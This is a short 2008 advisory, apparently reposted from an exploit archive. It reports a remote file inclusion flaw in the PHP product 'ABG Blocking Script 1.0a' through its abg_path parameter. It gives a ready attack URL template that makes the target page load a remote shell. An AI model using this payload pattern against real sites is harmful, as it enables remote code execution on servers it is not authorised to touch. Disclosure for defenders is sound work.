id: 3491
date: 07/31/2008
title: ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability
author: Lo$er
cves: 

=======================================================================
ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability
=======================================================================



=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?



#  0day.today [2023-03-21]  #